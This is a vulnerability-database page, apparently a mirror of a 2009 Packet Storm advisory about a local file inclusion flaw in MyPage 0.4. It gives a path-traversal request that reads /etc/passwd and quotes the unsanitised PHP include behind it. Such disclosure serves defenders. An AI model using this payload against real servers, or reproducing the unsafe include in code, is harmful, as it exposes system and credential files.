Lucene search

K

MyPage 0.4 Local File Inclusion

๐Ÿ—“๏ธย 22 Dec 2009ย 00:00:00Reported byย BayboraTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 15ย Views

MyPage 0.4 LFI Vulnerability on index.ph

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#############################################################  
# mypage0.4 LFI Vulnerability  
  
# Author: BAYBORA  
  
# Site: www.1923turk.biz<http://www.1923turk.biz>  
  
##############################################################  
  
# Exploit:  
  
  
Vuln file: index.php?page=LFI  
  
  
Exploit:  
  
  
POST http://server/index.php?page=../../../../../../../../etc/passwd  
  
index.php  
  
if(isset($_GET['page'])){  
...  
$inhalt=$inhaltsordner."/".$_GET['page'];}  
...  
$inhalt=str_replace("///","",$inhalt);  
if (FALSE==include$inhalt){echo$notfound;}  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
22 Dec 2009 00:00Current
7.4High risk
Vulners AI Score7.4
15
.json
Report